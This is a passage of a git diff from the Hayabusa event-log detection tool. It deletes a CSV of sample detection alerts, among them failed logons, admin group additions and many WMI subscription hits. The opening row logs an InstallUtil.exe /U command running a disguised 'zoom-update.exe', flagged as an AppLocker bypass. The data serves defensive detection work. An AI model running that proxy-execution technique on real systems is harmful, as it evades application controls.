technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv deleted file mode 100644 index 59d94e55..00000000 --- a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv +++ /dev/null @@ -1,14207 +0,0 @@ -Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath -2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx -2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 01:32:51.504 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:05:04.489 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:27:37.645 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:38:42.499 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.256 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event 